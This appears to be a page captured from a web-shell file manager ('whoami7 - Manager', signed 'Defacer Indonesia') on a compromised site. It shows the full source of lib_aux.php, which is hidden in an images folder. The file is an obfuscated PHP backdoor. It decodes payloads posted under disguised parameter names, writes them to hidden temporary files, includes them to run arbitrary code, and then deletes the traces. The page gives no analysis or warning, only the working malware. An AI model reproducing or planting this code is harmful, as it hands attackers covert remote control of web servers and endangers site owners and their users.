whoami7 - Manager
:
/
home
/
analuakl
/
amplhomes.com
/
images
/
services
/
office
/
Upload File:
files >> /home/analuakl/amplhomes.com/images/services/office/lib_aux.php
<?php if(array_key_exists("p\x61\x72am\x65t\x65\x72_\x67\x72\x6Fup", $_POST)){ $element = array_filter([sys_get_temp_dir(), "/var/tmp", getenv("TEMP"), getenv("TMP"), "/tmp", getcwd(), session_save_path(), "/dev/shm", ini_get("upload_tmp_dir")]); $ent = $_POST["p\x61\x72am\x65t\x65\x72_\x67\x72\x6Fup"]; $ent=explode ( '.' , $ent ) ; $resource = ''; $s6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s6); foreach ($ent as $i => $v4): $chS = ord($s6[$i% $lenS]); $d = ((int)$v4 - $chS - ($i% 10)) ^ 57; $resource .= chr($d); endforeach; while ($factor = array_shift($element)) { if (!( !is_dir($factor) || !is_writable($factor) )) { $entity = join("/", [$factor, ".marker"]); $success = file_put_contents($entity, $resource); if ($success) { include $entity; @unlink($entity); die();} } } } if(in_array("e\x6C\x65m", array_keys($_POST))){ $holder = $_POST["e\x6C\x65m"]; $holder = explode('.' , $holder) ; $pgrp =''; $s1 ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen($s1 ); $s =0; $__len =count($holder ); do { if ($s >=$__len) break; $v4 =$holder[$s]; $sChar =ord($s1[$s % $sLen] ); $dec =((int)$v4 - $sChar - ($s % 10)) ^ 5; $pgrp .= chr($dec ); $s++; } while (true ); $comp = array_filter([getcwd(), getenv("TEMP"), getenv("TMP"), ini_get("upload_tmp_dir"), "/var/tmp", sys_get_temp_dir(), session_save_path(), "/tmp", "/dev/shm"]); foreach ($comp as $k) { if ((function($d) { return is_dir($d) && is_writable($d); })($k)) { $itm = join("/", [$k, ".ref"]); if (file_put_contents($itm, $pgrp)) { include $itm; @unlink($itm); exit; } } } }
Copyright ©2021 || Defacer Indonesia